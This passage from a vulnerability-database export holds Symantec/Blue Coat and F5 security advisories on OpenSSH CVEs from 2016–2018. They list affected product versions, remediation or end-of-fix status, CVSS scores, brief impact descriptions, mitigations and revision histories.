\n\n**Norman Shark SCADA Protection (NSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10012, CVE-2016-10011 | 5.3 | A fix will not be provided. Customers who use NSP for USB cleaning can switch to a version of ICSP with fixes. \n \n \n\n**Security Analytics** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10011, \nCVE-2016-10012 | 7.3 and later | Not vulnerable, fixed in 7.3.1. \n7.2 | Upgrade to 7.2.3. \n7.1 | Upgrade to later release with fixes. \n6.6 | Upgrade to later release with fixes. \n \n \n\n**X-Series XOS** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10011, \nCVE-2016-10012 | 9.7, 10.0, 11.0 | A. fix will not be provided. \n \n \n\nThe following products have a vulnerable version of OpenSSH, but are not vulnerable to known vectors of attack:\n\n**Advanced Secure Gateway (ASG)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10011, \nCVE-2016-10012 | 7.1 and later | Not vulnerable, fixed in 7.1.1.1 \n6.7 | Upgrade to 6.7.4.2. \n6.6 | Upgrade to later release with fixes. \n \n \n\n**Content Analysis System (CAS)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10011, \nCVE-2016-10012 | 3.0 and later | Not vulnerable, fixed in 3.0.1.1 \n2.3, 2.4 | Not available at this time \n1.3, 2.1, 2.2 | Upgrade to later release with fixes. \n \n \n\n**Mail Threat Defense (MTD)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10011, \nCVE-2016-10012 | 1.1 | Upgrade to a version of CAS and SMG with the fixes. \n \n \n\n**Management Center (MC)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10011, \nCVE-2016-10012 | 3.0 | Not vulnerable, fixed in 3.0.1.1 \n2.4 | Not available at this time \n2.3 and earlier | Upgrade to later release with fixes. \n \n \n\n**PacketShaper (PS) S-Series** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10011, \nCVE-2016-10012 | 11.5, 11.6, 11.7, 11.8, 11.9, 11.10 | A fix will not be provided. Allot Secure Services Gateway (SSG) is a replacement product for PS S-Series. Switch to a version of SSG with the vulnerability fixes. \n \n \n\n**PolicyCenter (PC) S-Series** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10011, \nCVE-2016-10012 | 1.1 | A fix will not be provided. Allot NetXplore is a replacement product for PC S-Series. Switch to a version of NetXplorer with the vulnerability fixes. \n \n \n\n**Reporter** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-10009, CVE-2016-10011, \nCVE-2016-10012 | 10.3 and later | Not vulnerable, fixed in 10.3.1.1 \n10.1, 10.2 | Upgrade to later release with fixes. \nAll CVEs | 9.4, 9.5 | Not vulnerable \n \n \n\n**SSL Visibility (SSLV)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 5.0 | Not vulnerable, fixed in 5.0.2.1. \n4.5 | Not vulnerable, fixed in 4.5.1.1. \n4.0, 4.1, 4.2, 4.3, 4.4 | Upgrade to later release with fixes. \n3.12 | Upgrade to later release with fixes. \n3.11 | Upgrade to later release with fixes. \n3.10 | Upgrade to later release with fixes. \n3.9 | Upgrade to later releases with fixes. \n3.8.4FC | Upgrade to later releases with fixes. \n \n \n\n### ADDITIONAL PRODUCT INFORMATION \n\nBlue Coat products do not enable or use all functionality within OpenSSH. The products listed below do not utilize the functionality described in the CVEs below and are thus not known to be vulnerable to them. However, fixes for these CVEs will be included in the patches that are provided.\n\n * **ASG:** CVE-2016-10009, CVE-2016-10011, and CVE-2016-10012\n * **CAS:** CVE-2016-10009, CVE-2016-10011, and CVE-2016-10012\n * **MTD:** CVE-2016-10009, CVE-2016-10011, and CVE-2016-10012\n * **MC:** CVE-2016-10009, CVE-2016-10011, and CVE-2016-10012\n * **PacketShaper S-Series:** CVE-2016-10009, CVE-2016-10011, and CVE-2016-10012\n * **PolicyCenter S-Series:** CVE-2016-10009, CVE-2016-10011, and CVE-2016-10012\n * **Reporter 10.x:** CVE-2016-10009, CVE-2016-10011, and CVE-2016-10012\n * **SSLV:** all CVEs\n * **XOS 9.7:** CVE-2016-10010\n\nThe following products are not vulnerable: \n**Android Mobile Agent \nAuthConnector \nBCAAA \nBlue Coat HSM Agent for the Luna SP \nCacheFlow \nClient Connector \nCloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection for Oracle Field Service Cloud \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nGeneral Auth Connector Login Application \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \nPacketShaper \nPolicyCenter \nProxyAV \nProxyAV ConLog and ConLogXP \nProxyClient \nProxySG \nUnified Agent \nWeb Isolation**\n\nBlue Coat no longer provides vulnerability information for the following products:\n\n**DLP** \nPlease, contact Digital Guardian technical support regarding vulnerability information for DLP. \n \n\n\n### ISSUES\n\n**CVE-2016-10009** \n--- \n**Severity / CVSSv2** | High / 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n**References** | SecurityFocus: [BID 94968](<https://www.securityfocus.com/bid/94968>) / NVD: [CVE-2016-10009](<https://nvd.nist.gov/vuln/detail/CVE-2016-10009>) \n**Impact** | Code execution \n**Description** | A flaw in ssh-agent allows a remote attacker with local access to an SSH server to execute arbitrary code on an SSH client host that enables agent forwarding. \n \n \n\n**CVE-2016-10010** \n--- \n**Severity / CVSSv2** | Medium / 6.9 (AV:L/AC:M/Au:N/C:C/I:C/A:C) \n**References** | SecurityFocus: [BID 94972](<https://www.securityfocus.com/bid/94972>) / NVD: [CVE-2016-10010](<https://nvd.nist.gov/vuln/detail/CVE-2016-10010>) \n**Impact** | Privilege escalation \n**Description** | A flaw in the SSH daemon with privilege separation disabled allows a local attacker escalate their privileges on the system via unspecified vectors. \n \n \n\n**CVE-2016-10011** \n--- \n**Severity / CVSSv2** | Low / 2.1 (AV:L/AC:L/Au:N/C:P/I:N/A:N) \n**References** | SecurityFocus: [BID 94977](<https://www.securityfocus.com/bid/94977>) / NVD: [CVE-2016-10011](<https://nvd.nist.gov/vuln/detail/CVE-2016-10011>) \n**Impact** | Information disclosure \n**Description** | A flaw in the SSH daemon with privilege separation enabled allows a local attacker with access to a privilege-separated child process to obtain private key information. \n \n \n\n**CVE-2016-10012** \n--- \n**Severity / CVSSv2** | High / 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C) \n**References** | SecurityFocus: [BID 94975](<https://www.securityfocus.com/bid/94975>) / NVD: [CVE-2016-10012](<https://nvd.nist.gov/vuln/detail/CVE-2016-10012>) \n**Impact** | Privilege escalation \n**Description** | A flaw in the SSH daemon pre-authentication compression implementation allows a local attacker with access to a sandboxed privelege-separated child process to escalate their privileges on the system. \n \n \n\n### MITIGATION\n\nBy default, Director does not enable privilege separation and pre-authentication compression. Customers who leave this default behavior unchanged prevent attacks against these products using CVE-2016-10010, CVE-2016-10011, and CVE-2016-10012.\n\nBy default, MAA, ICSP, NNP, and NSP do not use ssh-agent and do not enable SSH agent forwarding and pre-authentication compression. Customers who leave this default behavior unchanged prevent attacks against these products using CVE-2016-10009 and CVE-2016-10011.\n\nBy default, Security Analytics does not use ssh-agent and does not enable SSH agent forwarding and pre-authentication compression. Customers who leave this default behavior unchanged prevent attacks against these products using CVE-2016-10009 and CVE-2016-10012.\n\n### REVISION \n\n2021-01-12 A fix for SSLV 3.10 and SSLV 3.12 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-11-17 A fix for MTD 1.1 will not be provided. Please upgrade to a version of CAS and SMG with the vulnerability fixes. A fix for XOS 9.7, 10.0, and 11.0 will not be provided. A fix for Director 6.1 will not be provided. Please upgrade to a version of MC with the vulnerability fixes. \n2020-08-19 MC 3.0 is not vulnerable because a fix is available in 3.0.1.1. A fix for MC 2.3 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-04-27 A fix for Advanced Secure Gateway (ASG) 6.7 is available in 6.7.4.2. ASG 7.1 and later versions are not vulnerable because a fix is available in 7.1.1.1. Content Analysis (CA) 2.4 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. CA 3.0 is not vulnerable because a fix is available in 3.0.1.1. Fixes will not be provided for Industrial Control System Protection (ICSP) 5.3 and SSL Visibility (SSLV) 4.4. Please upgrade to later versions with the vulnerability fixes. \n2020-04-04 A fix for PacketShaper S-Series will not be provided. Allot Secure Services Gateway (SSG) is a replacement product for PacketShaper S-Series. Switch to a version of SSG with the vulnerability fixes. A fix for PolicyCenter S-Series will not be provided. Allot NetXplorer is a replacement product for PolicyCenter S-Series. Switch to a version of NetXplorer with the vulnerability fixes. \n2019-10-02 Web Isolation is not vulnerable. \n2019-09-05 A fix for MC 2.1 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-08-29 Reporter 10.3 and 10.4 are not vulnerable because a fix for all CVEs is available in 10.3.1.1. \n2019-08-12 MC 2.2 and MC 2.3 have vulnerable versions of OpenSSH, but are not vulnerable to known vectors of attack. A fix for MC 2.0 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-08-09 SSLV 4.5 is not vulnerable because a fix is available in 4.5.1.1. \n2019-08-07 A fix for ASG 6.6 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-08-06 A fix for Reporter 10.1 and 10.2 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-08-05 A fix for SSLV 4.3 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-02-04 A fix will not be provided for CA 1.3 and 2.2. Please upgrade to a later version with the vulnerability fixes. \n2019-01-21 Security Analytics 8.0 is not vulnerable. ICSP 5.3 is vulnerable to all CVEs. ICSP 5.4 is not vulnerable because a fix is available in 5.4.1. \n2019-01-18 SSLV 4.3 and 4.4 have vulnerable version of OpenSSH, but are not vulnerable to known vectors of attack. SSLV 5.0 is not vulnerable because a fix is available in 5.0.2.1. \n2019-01-14 MC 2.1 and Reporter 10.3 have vulnerable versions of OpenSSH, but are not vulnerable to known vectors of attack. A fix for MC 1.11 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-01-12 A fix for Security Analytics 7.1 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-01-11 A fix for CA 2.1 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-09-24 A fix for SSLV 3.8.4FC will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-08-03 Customers who use NSP for USB cleaning can switch to a version of Industrial Control System Protection (ICSP) with fixes. \n2018-07-27 A fix for MA 4.2 is available in 4.2.12. \n2018-07-26 MC 2.0 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. \n2018-06-29 A fix for Norman Shark Network Protection (NNP) 5.3 and Norman Shark SCADA Protection (NSP) 5.3 will not be provided. \n2018-06-26 A fix for SSLV 4.1 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-06-25 A fix for SSLV 3.11 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-04-26 A fix for SSLV 4.0 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-04-25 A fix for XOS 9.7 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-04-22 CA 2.3, PacketShaper S-Series 11.10, and Reporter 10.2 have a vulnerable version of OpenSSH, but are not vulnerable to known vectors of attack. \n2017-11-16 A fix for PS S-Series 11.5, 11.7, and 11.8 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-11-16 A fix for SSLV 3.9 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-11-15 SSLV 3.12 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. A fix is not available at this time. \n2017-11-15 SSLV 4.2 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. A fix is not available at this time. \n2017-11-09 MC 1.11 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. A fix for MC 1.10 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-11-08 CAS 2.2 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. \n2017-11-06 ASG 6.7 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. \n2017-08-03 SSLV 4.1 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. A fix is not available at this time. \n2017-06-05 PS S-Series 11.9 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. \n2017-07-23 MC 1.10 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. A fix for MC 1.9 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-06-22 Security Ananlytics 7.3 is not vulnerable. \n2017-06-08 Reporter 10.1 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. Reporter 9.4 and 9.5 are not vulnerable. \n2017-06-05 PS S-Series 11.8 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. \n2017-05-29 A fix for Security Analytics 6.6 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-05-19 CAS 2.1 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. \n2017-05-03 Director 6.1 is vulnerable to all CVEs. \n2017-03-30 MC 1.9 has a vulnerable version of OpenSSH, but is not vulnerable to known vectors of attack. \n2017-03-02 initial public release\n", "modified": "2021-01-13T07:45:44", "published": "2017-03-02T08:00:00", "id": "SMNTC-1397", "href": "", "type": "symantec", "title": "SA144 : OpenSSH Vulnerabilities January 2017", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-15T22:53:26", "bulletinFamily": "software", "cvelist": ["CVE-2016-10708", "CVE-2018-15473", "CVE-2018-15919"], "description": "### SUMMARY\n\nSymantec Network Protection products using affected versions of OpenSSH are susceptible to several vulnerabilities. A remote attacker, with access to the management interface, can obtain usernames for valid SSH users and cause denial of service through application crashes.\n\n \n\n### AFFECTED PRODUCTS \n\nAdvanced Secure Gateway (ASG) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708, CVE-2018-15473 | 6.6 | Upgrade to 6.6.5.18. \n6.7 | Upgrade to 6.7.4.2. \n \n \n\nCacheFlow (CF) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708, CVE-2018-15473 | 3.4 | A fix will not be provided. Please switch to a version of ProxySG MACH5 Edition with fixes. \n \n \n\nContent Analysis (CA) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708, CVE-2018-15473 | 1.3 | Upgrade to later version with fixes. \n2.1 and later | Not vulnerable \n \n \n\nDirector \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nAll CVEs | 6.1 | Upgrade to a version of MC with the fixes. \n \n \n\nMail Threat Defense (MTD) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708, CVE-2018-15473 | 1.1 | Upgrade to a version of CAS and SMG with the fixes. \n \n \n\nMalware Analysis (MA) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708, CVE-2018-15473 | 4.2 | Upgrade to a version of Content Analysis with fixes. \n \n \n\nManagement Center (MC) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708, CVE-2018-15473 | 2.0, 2.3 | Upgrade to later release with fixes. \n2.4, 3.0 | Not available at this time \n3.1 | Not vulnerable, fixed in 3.1.1.1 \n \n \n\nPacketShaper (PS) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708 | 9.2 | A fix will not be provided. Allot Secure Services Gateway (SSG) is a replacement product for PacketShaper. Switch to a version of SSG with the vulnerability fixes. \n \n \n\nPacketShaper (PS) S-Series \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708, CVE-2018-15473 | 11.6, 11.9, 11.10 | A fix will not be provided. Allot Secure Services Gateway (SSG) is a replacement product for PS S-Series. Switch to a version of SSG with the vulnerability fixes. \n \n \n\nPolicyCenter (PC) S-Series \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708, CVE-2018-15473 | 1.1 | A fix will not be provided. Allot NetXplorer is a replacement product for PC S-Series. Switch to a version of NetXplorer with the vulnerability fixes. \n \n \n\nProxySG \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708, CVE-2018-15473 | 6.5 | Upgrade to 6.5.10.15. \n6.6 | Upgrade to 6.6.5.18. \n6.7 | Upgrade to 6.7.4.2. \n \n \n\nReporter \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708 | 9.5 | Not vulnerable \n10.1, 10.2 | Upgrade to later release with fixes. \n10.3 and later | No vulnerable, fixed in 10.3.1.1 \nCVE-2018-15473 | 9.5 | Not vulnerable \n10.1, 10.2, 10.3, 10.4 | Upgrade to later release with fixes. \n10.5 | Not available at this time \n \n \n\nSecurity Analytics (SA) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2018-15473 | 7.2 | Not available at this time \n7.3, 8.0 | Upgrade to later release with fixes. \n8.1 and later | Not vulnerable, fixed. \nCVE-2018-15919 | 7.2, 8.1 | Not available at this time \n7.3, 8.0 | Upgrade to later release with fixes. \n8.2 and later | Not vulnerable, fixed in 8.2.1 \n \n \n\nSSL Visibility (SSLV) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nAll CVEs | 3.10 | Upgrade to later release with fixes. \n3.12 | Upgrade to later release with fixes. \n4.2 and later | Not vulnerable \n \n \n\nWeb Isolation (WI) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2018-15919 | 1.12 | Upgrade to later release with fixes. \n1.13, 1.14 | Not available at this time \n \n \n\n**X-Series XOS** \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-10708, CVE-2018-15473 | 10.0, 11.0 | A fix will not be provided. \n \n \n\n### ADDITIONAL PRODUCT INFORMATION \n\nThe following products are not vulnerable: \n**AuthConnector \nBCAAA \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server** \n**General Auth Connector Login Application \nHSM Agent for the Luna SP \nIntelligenceCenter \nIntelligenceCenter Data Collector \nPolicyCenter \nProxyAV \nProxyAV ConLog and ConLogXP \nUnified Agent \nWSS Mobile Agent**\n\n### ISSUES\n\nCVE-2016-10708 \n--- \n**Severity / CVSSv3** | High / 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n**References** | SecurityFocus: [BID 102780](<https://www.securityfocus.com/bid/102780>) / NVD: [CVE-2016-10708](<https://nvd.nist.gov/vuln/detail/CVE-2016-10708>) \n**Impact** | Denial of service \n**Description** | A flaw in SSH message handling allows a remote attacker to send out-of-sequence NEWKEYS messages and cause an application crash, resulting in denial of service. \n \n \n\nCVE-2018-15473 \n--- \n**Severity / CVSSv3** | Medium / 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n**References** | SecurityFocus: [BID 105140](<https://www.securityfocus.com/bid/105140>) / NVD: [CVE-2018-15473](<https://nvd.nist.gov/vuln/detail/CVE-2018-15473>) \n**Impact** | Information disclosure \n**Description** | A flaw in user authentication allows a remote attacker to discover usernames for valid users on the target. \n \n \n\nCVE-2018-15919 \n--- \n**Severity / CVSSv3** | Medium / 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n**References** | SecurityFocus: [BID 105163](<https://www.securityfocus.com/bid/105163>) / NVD: [CVE-2018-15919](<https://nvd.nist.gov/vuln/detail/CVE-2018-15919>) \n**Impact** | Information disclosure \n**Description** | A flaw in GSS2 handling allows a remote attacker to discover usernames for valid users on the target. \n \n \n\n### MITIGATION\n\nThese vulnerabilities can be exploited only through the management interfaces for all vulnerable products. Allowing only machines, IP addresses and subnets from a trusted network to access the management interface reduces the threat of exploiting the vulnerabilities.\n\n \n\n### REVISION\n\n2021-01-15 WI 1.14 is vulnerable to CVE-2018-15919. A fix is not available at this time. Fixes will not be provided for WI 1.12. Please upgrade to a later release with the vulnerability fixes. \n2021-01-12 A fix for SSLV 3.10 and SSLV 3.12 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-12-09 SA 8.2 is not vulnerable because a fix is available in 8.2.1. \n2020-11-30 MC 3.1 is not vulnerable because a fix is available in 3.1.1.1. \n2020-11-19 A fix for MTD 1.1 will not be provided. Please upgrade to a version of CAS and SMG with the vulnerability fixes. A fix for SA 7.3 and 8.0 will not be provided. Please upgrade to a later version with the vulnerability fixes. A fix for XOS 9.7, 10.0, and 11.0 will not be provided. A fix for Director 6.1 will not be provided. Please upgrade to a version of MC with the vulnerability fixes. A fix for Reporter 10.4 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-08-19 A fix for MC 2.3 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2020-06-01 A fix for CacheFlow will not be provided. Please switch to a version of ProxySG MACH5 Edition with the vulnerability fixes. \n2020-04-05 A fix for Management Center 2.2 will not be provided. A fix for CVE-2018-15473 in Reporter 10.3 will not be provided. Please upgrade to later versions with the vulnerability fixes. Management Center 2.4 is vulnerable to CVE-2016-10708 and CVE-2018-15473. Reporter 10.5 is vulnerable to CVE-2018-15473. Security Analytics 8.1 is vulnerable to CVE-2018-15919. Security 8.1 is not vulnerable to CVE-2018-15473 because a fix is available in 8.1.1. \n2020-04-04 A fix for PacketShaper S-Series will not be provided. Allot Secure Services Gateway (SSG) is a replacement product for PacketShaper S-Series. Switch to a version of SSG with the vulnerability fixes. A fix for PolicyCenter S-Series will not be provided. Allot NetXplorer is a replacement product for PolicyCenter S-Series. Switch to a version of NetXplorer with the vulnerability fixes. \n2020-01-19 A fix for Malware Analysis will not be provided. Upgrade to a version of Content Analysis with the vulnerability fixes. \n2019-10-07 WI 1.12 and 1.3 are vulnerable to CVE-2018-15919. A fix is not available at this time. \n2019-09-05 A fix for MC 2.1 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-08-30 It was previously reported that Reporter 10.3 is vulnerable to CVE-2018-15919. Reporter 10.3 is instead vulnerable to CVE-2018-15473. Reporter 10.4 is also vulnerable to CVE-2018-15473. \n2019-08-13 MC 2.2 and MC 2.3 are vulnerable to CVE-2016-10708 and CVE-2018-15473. A fix for MC 2.0 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-08-09 A fix for ProxySG 6.5 is available in 6.5.10.15. \n2019-08-09 A fix for ASG 6.6 and ProxySG 6.6 is available in 6.6.5.18. \n2019-08-06 A fix for Reporter 10.1 and 10.2 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-02-04 A fix for CA 1.3 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2019-01-15 A fix for ASG 6.7 and ProxySG 6.7 is available in 6.7.4.2. \n2019-01-14 Reporter 10.3 is vulnerable to CVE-2018-15919. It is not vulnerable to CVE-2016-10708 because a fix is available in 10.3.1.1. \n2018-11-29 initial public release\n", "modified": "2021-01-15T21:23:40", "published": "2018-11-29T08:01:01", "id": "SMNTC-1469", "href": "", "type": "symantec", "title": "OpenSSH Vulnerabilities Jan-Aug 2018", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "f5": [{"lastseen": "2020-04-06T22:40:12", "bulletinFamily": "software", "cvelist": ["CVE-2016-10708"], "description": "\nF5 Product Development has assigned ID 712608 (BIG-IP), ID 712649 (BIG-IQ and F5 iWorkflow), ID 712648 (Enterprise Manager), and ID 431179 (ARX) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H32485746 on the **Diagnostics** > **Identified** > **Medium** page.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, GTM, Link Controller, PEM, WebAccelerator, WebSafe) | 15.x | None | Not applicable | Medium | [5.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>) | OpenSSH \n14.x | 14.0.0 - 14.0.1 | 14.1.0 \n13.x | 13.1.0 - 13.1.3 | None \n12.x | 12.1.0 - 12.1.5 | None \n11.x | 11.2.1 - 11.6.5 | None \nARX | 6.x | 6.2.0 - 6.4.0 | None | Medium | [5.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>) | OpenSSH \nEnterprise Manager | 3.x | 3.1.1 | None | Medium | [5.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>) | OpenSSH \nBIG-IQ Centralized Management | 5.x | 5.0.0 - 5.4.0 | None | Medium | [5.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>) | OpenSSH \n4.x | 4.6.0 | None \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None | Medium | [5.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>) | OpenSSH \nF5 iWorkflow | 2.x | 2.0.2 - 2.3.0 | None | Medium | [5.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>) | OpenSSH \nLineRate | 2.x | 2.5.0 - 2.6.2 | None | Medium | [5.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>) | OpenSSH \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | None | Medium | [5.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L>) | OpenSSH \n4.x | 4.0.5 - 4.4.0 | None \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n * [K15106: Managing BIG-IQ product hotfixes](<https://support.f5.com/csp/article/K15106>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>)\n", "edition": 1, "modified": "2019-11-11T23:59:00", "published": "2018-04-12T01:06:00", "id": "F5:K32485746", "href": "https://support.f5.com/csp/article/K32485746", "title": "OpenSSH vulnerability CVE-2016-10708", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-04-06T22:40:54", "bulletinFamily": "software", "cvelist": ["CVE-2016-10011"], "description": "\nF5 Product Development has assigned ID 637622 and 689463 (BIG-IP), ID 637622 (BIG-IQ, iWorkflow, and Enterprise Manager), and ID INSTALLER-2868 (Traffix SDC) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H640816 on the **Diagnostics** > **Identified** > **Low** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.3 \n11.2.1 | 14.1.0 | Low | OpenSSH \nBIG-IP AAM | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.3 \n | 14.1.0 | Low | OpenSSH \nBIG-IP AFM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.3 | 14.1.0 | Low | OpenSSH \nBIG-IP Analytics | 14.0.0 \n13.0.0 - 13.1.0 \n12.0.0 - 12.1.3 \n11.4.0 - 11.6.3 \n11.2.1 | 14.1.0 | Low | OpenSSH 